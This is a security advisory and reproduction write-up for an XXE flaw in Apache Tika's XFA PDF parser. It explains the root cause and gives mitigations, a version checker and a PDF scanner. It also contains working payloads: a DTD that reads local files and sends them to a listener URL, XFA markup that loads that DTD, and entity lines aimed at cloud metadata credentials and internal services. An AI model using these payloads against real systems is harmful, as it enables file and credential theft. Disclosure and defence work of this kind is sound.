Apache Tika XXE Out-of-Band Data Exfiltration

Summary

Product / Component: Apache Tika (tika-core + tika-parser-pdf-module) - XFA PDF Parser
Impact: An unauthenticated attacker can exfiltrate any local file readable by the Tika process from systems that parse a malicious PDF. The data is sent to an attacker-controlled server in HTTP requests, so exploitation works "blind", without the attacker ever seeing parser output. The same mechanism enables SSRF against internal services (cloud metadata endpoints, internal APIs).
Severity: Critical (CVSS 9.8 per GHSA)
Affected Versions: tika-core 1.13 - 3.2.1, tika-parser-pdf-module 2.0.0 - 3.2.1
Fixed: Apache Tika 3.2.2 (commit bfee6d5)
Reproduction Status: CONFIRMED (Tika 3.2.1, OpenJDK 21.0.9, Ubuntu 22.04)
Identifiers:
- CVE-2025-54988
- CVE-2025-66516
- GHSA-f58c-gq56-vjjf
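
The affected ranges listed above can be checked mechanically against a dependency inventory. The following is a minimal sketch rather than an official tool: the `AFFECTED` table only restates the ranges from this summary, and `parse_version` and `is_affected` are hypothetical helper names. It assumes plain dotted numeric versions and ignores any qualifier after a hyphen.

```python
# Affected ranges as stated in the summary (inclusive on both ends).
AFFECTED = {
    "tika-core": ((1, 13), (3, 2, 1)),
    "tika-parser-pdf-module": ((2, 0, 0), (3, 2, 1)),
}


def parse_version(text):
    """Turn '3.2.1' (or '3.2.1-SNAPSHOT') into a comparable tuple of ints."""
    numeric = text.split("-")[0]
    return tuple(int(part) for part in numeric.split("."))


def is_affected(artifact, version):
    """Return True if the artifact version falls inside a listed range."""
    bounds = AFFECTED.get(artifact)
    if bounds is None:
        return False  # artifact not covered by this summary
    low, high = bounds
    return low <= parse_version(version) <= high


if __name__ == "__main__":
    for artifact, version in [("tika-core", "3.2.1"), ("tika-core", "3.2.2")]:
        print(artifact, version, "affected" if is_affected(artifact, version) else "not affected")
```

Tuple comparison keeps the range check short; a production inventory scan would more likely rely on a proper Maven version parser.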

Root Cause

Apache Tika's PDF parser delegates XFA (XML Forms Architecture) processing to the Xerces XML parser with external entity resolution enabled. When Tika processes a malicious PDF whose XFA form contains a DOCTYPE declaration referencing an external DTD, the following sequence occurs:

Tika parses the PDF and encounters the embedded XFA XML
Xerces resolves the external DTD from an attacker-controlled server
The DTD defines parameter entities that:
- Read local files via file:// URIs (e.g., /etc/hostname, /etc/passwd)
- Construct a URL containing the file contents as a parameter
Xerces makes an outbound HTTP request to http://attacker/?data=<file_contents>
The attacker receives the exfiltrated data in their server logs

Key vulnerability characteristics:

Works in "blind" scenarios where parser output isn't returned to the attacker
Silent exfiltration via network - no visible indication in parser output
Can target any file readable by the Tika process
Enables SSRF to internal services (AWS metadata at 169.254.169.254, internal APIs)

The fix in Tika 3.2.2 disables external parameter entity resolution for XFA parsing, preventing the DTD fetch and subsequent data exfiltration.
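
The general idea of switching off external entity resolution can be illustrated outside Java. The sketch below is an analogy using Python's standard `xml.sax` module; it is not Tika's patch and not the Xerces API. `RecordingResolver`, `TextCollector`, and `parse_hardened` are hypothetical names introduced for illustration. Recent Python versions already leave external general entities off by default, so the explicit `setFeature` calls mainly make the intent visible.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver
from xml.sax.handler import feature_external_ges, feature_external_pes
from xml.sax.xmlreader import InputSource


class RecordingResolver(EntityResolver):
    """Records every external entity the parser asks to resolve."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        # Return an empty in-memory source so nothing is ever fetched.
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b""))
        return source


class TextCollector(ContentHandler):
    """Collects character data so the caller can inspect expanded text."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_hardened(xml_bytes):
    """Parse with external general and parameter entities disabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    resolver, collector = RecordingResolver(), TextCollector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.text), resolver.requested
```

With both features disabled, a document that references an external entity should parse without the resolver being consulted, which is the behaviour a hardened XFA parser needs.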

Attack Chain

┌─────────────────┐     ┌──────────────────┐     ┌─────────────────┐
│ Malicious PDF   │────▶│  Apache Tika     │────▶│ Attacker Server │
│ with XFA + DTD  │     │  3.2.1           │     │ (port 8888)     │
│ reference       │     │                  │     │                 │
└─────────────────┘     └──────────────────┘     └─────────────────┘
                              │                        │
                              │ 1. GET /evil.dtd       │
                              │───────────────────────▶│
                              │                        │
                              │ 2. DTD with entities   │
                              │◀───────────────────────│
                              │                        │
                              │ 3. Read /etc/hostname  │
                              │   (local file)         │
                              │                        │
                              │ 4. GET /?data=<hostname>│
                              │───────────────────────▶│
                              │                        │
                              │     EXFILTRATED!       │

Reproduction

Prerequisites

Java 17+ (tested with OpenJDK 21.0.9)
Python 3.x (for HTTP server and PoC generator)
Git
Network connectivity (or localhost testing)

Automated Reproduction

# Run the reproduction script
./repro/reproduction_steps.sh

The script:

Clones the public PoC from https://github.com/mgthuramoemyint/POC-CVE-2025-54988
Downloads tika-app-3.2.1.jar from Maven Central
Generates malicious PDF (malicious_oob.pdf) with embedded XFA and external DTD reference
Creates evil.dtd that extracts /etc/hostname and sends it to localhost:8888
Starts Python HTTP server on port 8888 to serve DTD and capture exfiltrated data
Executes Tika against the malicious PDF
Verifies the exfiltration by checking server logs

Manual Reproduction

Create the malicious DTD (evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/?data=%file;'>">
%all;

Create PDF with XFA containing:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
  %dtd;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>

Start listener:

python3 -m http.server 8888 --directory /path/to/dtd/

Parse with Tika:

java -jar tika-app-3.2.1.jar malicious.pdf

Check listener logs for exfiltrated data

Evidence

Listener Log (`logs/listener_20251209-152555.log`)

127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /?data=lima-pruva-ghsa-f58c-gq56-vjjf-apache-tika-xxe-oob-e-20251209134317 HTTP/1.1" 200 -

Analysis:

First request: Tika fetched evil.dtd from the attacker server
Second request: Tika sent the contents of /etc/hostname (the VM hostname) in the data parameter
Both requests occurred within the same second, demonstrating immediate exploitation
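
When several runs produce many log files, the exfiltrated values can be pulled out of the listener logs programmatically. This is a minimal sketch that assumes the `python3 -m http.server` access-log layout shown above; `LOG_LINE` and `exfiltrated_values` are hypothetical names, and the `data` parameter name comes from the DTD used in this report.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches lines such as:
# 127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
LOG_LINE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def exfiltrated_values(lines, param="data"):
    """Return the decoded values of `param` from every matching request line."""
    values = []
    for line in lines:
        match = LOG_LINE.match(line)
        if match is None:
            continue  # not an access-log line
        query = urlsplit(match.group("target")).query
        values.extend(parse_qs(query).get(param, []))
    return values


if __name__ == "__main__":
    import sys

    # Usage: python3 parse_listener_log.py logs/listener_*.log
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as handle:
            for value in exfiltrated_values(handle):
                print(f"{path}: {value}")
```

Requests without the parameter, such as the initial DTD fetch, contribute nothing to the result.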

Environment

Java: OpenJDK 21.0.9
Python: 3.10.12
OS: Ubuntu 22.04 (Lima VM)
Tika Version: 3.2.1 (vulnerable)

Artifacts

Malicious PDF: artifacts/tika-oob-runs/run-*/payload/malicious_oob.pdf
Evil DTD: artifacts/tika-oob-runs/run-*/payload/evil.dtd
Listener logs: logs/listener_*.log
Tika output: logs/tika_*.log
PoC source: artifacts/POC-CVE-2025-54988/

Real-World Attack Scenarios

Scenario 1: Document Processing Service

An organization uses Tika to extract text/metadata from user-uploaded PDFs. An attacker uploads a malicious PDF to exfiltrate:

AWS credentials from ~/.aws/credentials
Environment variables containing secrets
Application configuration files
Database connection strings

Scenario 2: Cloud Metadata SSRF

The attacker crafts a DTD that requests cloud metadata instead of a local file:

<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

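This enables credential theft from cloud instances running Tika. The path shown is the AWS instance metadata endpoint and is reachable this way only where IMDSv1 is permitted; IMDSv2, GCP, and Azure require a session token or a custom request header that an entity fetch cannot supply.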

Scenario 3: Internal Network Reconnaissance

Use XXE to probe internal services:

<!ENTITY % file SYSTEM "http://internal-api:8080/health">

Map internal infrastructure and identify additional attack surfaces.
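
When reviewing outbound requests from a document processing host, destinations like those in Scenarios 2 and 3 can be flagged automatically. The sketch below is one possible classifier built on Python's standard `ipaddress` module; `classify_destination` is a hypothetical name, and the three labels are an assumption of this example rather than part of any Tika tooling.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_destination(url):
    """Classify a URL's host as 'internal', 'external', or 'unresolved'."""
    host = urlsplit(url).hostname
    if not host:
        return "unresolved"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: it must be resolved before it can be classified.
        return "unresolved"
    if address.is_loopback or address.is_link_local or address.is_private:
        return "internal"
    return "external"


if __name__ == "__main__":
    for url in (
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://internal-api:8080/health",
    ):
        print(url, "->", classify_destination(url))
```

Host names are reported as unresolved on purpose: a name such as internal-api only reveals its nature after DNS resolution inside the target network, so a real egress filter would classify the resolved address.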

Recommendations

Immediate Mitigations

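Upgrade to Tika 3.2.2 or later. The fix lives in tika-core, so upgrading tika-parser-pdf-module alone is not sufficient; tika-core itself must be at 3.2.2 or later: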

<dependency>
    <groupId>org.apache.tika</groupId>
    <artifactId>tika-core</artifactId>
    <version>3.2.2</version>
</dependency>

If upgrade is not immediately possible:
- Disable XFA parsing entirely via tika-config.xml
- Implement network egress filtering to block unexpected outbound requests
- Run Tika in a sandboxed environment with no network access

Defense in Depth

Network Controls:
- Block outbound HTTP/HTTPS from document processing services
- Implement allow-list for necessary external resources
- Monitor for unusual DNS queries or outbound connections
File System Isolation:
- Run Tika with minimal file system permissions
- Use containerization with read-only root filesystem
- Mount only necessary directories
Input Validation:
- Scan uploaded PDFs for suspicious XML structures before processing
- Implement file size limits to prevent resource exhaustion
- Consider using a separate, isolated service for PDF processing
Monitoring:
- Alert on Tika processes making unexpected network connections
- Log all outbound requests from document processing infrastructure
- Monitor for access to sensitive files
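
The pre-processing scan suggested under Input Validation could start from a heuristic like the one below. It is a rough sketch and not a substitute for upgrading: it only looks for an `/XFA` key and for DOCTYPE or ENTITY declarations in the raw bytes and in streams that inflate as zlib data. Encrypted PDFs, object streams, other filters, and escaped names can all evade it. `scan_pdf_bytes`, `SUSPICIOUS_MARKERS`, and `STREAM_BODY` are hypothetical names.

```python
import re
import zlib

# Byte patterns that would not be expected in a benign XFA packet.
SUSPICIOUS_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")
# Naive match for the body of a PDF stream object.
STREAM_BODY = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def scan_pdf_bytes(data):
    """Return a set of findings: 'xfa' and/or the markers that were seen."""
    findings = set()
    if b"/XFA" in data:
        findings.add("xfa")

    # Inspect the raw file plus every stream that inflates as zlib data.
    chunks = [data]
    for match in STREAM_BODY.finditer(data):
        try:
            chunks.append(zlib.decompressobj().decompress(match.group(1)))
        except zlib.error:
            continue  # not FlateDecode (or corrupt); raw bytes are still scanned

    for chunk in chunks:
        for marker in SUSPICIOUS_MARKERS:
            if marker in chunk:
                findings.add(marker.decode("ascii"))
    return findings


if __name__ == "__main__":
    import sys

    # Usage: python3 scan_pdf.py upload.pdf
    with open(sys.argv[1], "rb") as handle:
        print(sorted(scan_pdf_bytes(handle.read())))
```

A file that reports both an XFA form and a DOCTYPE or ENTITY declaration is a reasonable candidate for quarantine before it reaches Tika.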

References

GHSA-f58c-gq56-vjjf - GitHub Security Advisory
CVE-2025-54988 - CVE Record
CVE-2025-66516 - NVD Entry
Apache Tika Security - Official Security Page
Fix Commit bfee6d5 - Patch Details
POC-CVE-2025-54988 - Public PoC

CWE Classification

CWE-611: Improper Restriction of XML External Entity Reference
CWE-918: Server-Side Request Forgery (SSRF)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Report Generated: 2025-12-09
Reproduction Status: CONFIRMED
Idempotency Verified: Yes (multiple successful runs)

N3mes1s/CVE-2025-66516.md
